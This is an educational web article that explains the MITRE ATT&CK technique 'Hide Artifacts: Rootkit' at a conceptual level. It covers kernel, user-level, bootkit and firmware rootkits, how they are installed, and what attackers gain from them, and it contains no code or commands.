Skip to content

Hide Artifacts: Rootkit

What: Hide Artifacts: Rootkit

Rootkits are a type of malicious software designed specifically to gain unauthorized access to a computer system while hiding its presence from users, administrators, and security mechanisms. Rootkits fall under the broader category of "Hide Artifacts" in cybersecurity frameworks such as MITRE ATT&CK because their primary function is to conceal themselves and other malicious activities within the host system.

How: Mechanisms and Techniques

Rootkits operate by integrating deeply with the operating system. They can manipulate standard system functionalities to evade detection through several mechanisms:

  1. Kernel-Level Rootkits: These rootkits modify the kernel space of an operating system, allowing them full control over the system while being exceptionally stealthy. They can intercept and alter system calls, manipulate process and data structures in memory, or directly modify the kernel code or loadable kernel modules.

  2. User-Level Rootkits: Operating in user space, these rootkits intercept and modify standard API calls, altering the information returned to userspace programs. They might hook critical functions such as those related to file systems or network operations to hide specific files or network connections.

  3. Bootkit: A specialized form of rootkit that infects the Master Boot Record (MBR) or Volume Boot Record (VBR), enabling it to load before the full OS boots up, thereby gaining control at a very early stage during the boot process.

  4. Hardware/Firmware Rootkits: These are embedded directly into firmware or hardware devices like BIOS, hard drives, or network cards. They are challenging to detect and can provide persistence even through typical cleaning processes including OS reinstallation.

Where: Deployment and Execution

Rootkits can be installed through several vectors:

  • Phishing Attacks: Tricking users into executing malicious attachments that install rootkits.
  • Exploit Kits: Exploiting vulnerabilities in software to gain unauthorized access and install rootkits.
  • Supply Chain Attacks: Compromising software or hardware components before they are installed on target systems.
  • Physical Access: Directly accessing a computer's hardware interfaces to install firmware or hardware-based rootkits.

Once installed, rootkits typically reside:

  • Within kernel memory as modules or drivers.
  • As modified binaries or additional code within user-space applications.
  • Within device firmware where they remain hidden from traditional antivirus software.

Why: Objectives and Implications

The primary objective of deploying a rootkit is to maintain persistent, undetected access to a host machine. This allows attackers continuous control over compromised systems for various purposes:

  • Data Theft: Accessing sensitive information from filesystems without detection.
  • Surveillance: Monitoring user actions and network traffic covertly.
  • Resource Hijacking: Utilizing system resources for processes like cryptocurrency mining without user consent.
  • Further Attacks: Using compromised machines as pivot points for lateral movement within a network.

The implications of rootkit infections are severe due not only to their stealthiness but also because they often grant attackers high-level privileges over infected systems. This makes detecting and removing them particularly challenging – requiring specialized tools capable of scanning at a low level within operating systems (e.g., using live OS environments).

In conclusion, understanding how "Hide Artifacts: Rootkit" operates within MITRE's framework helps in developing effective defense strategies against complex threats posed by sophisticated malware aimed at deep integration into systems for nefarious purposes while remaining hidden from conventional detection methods.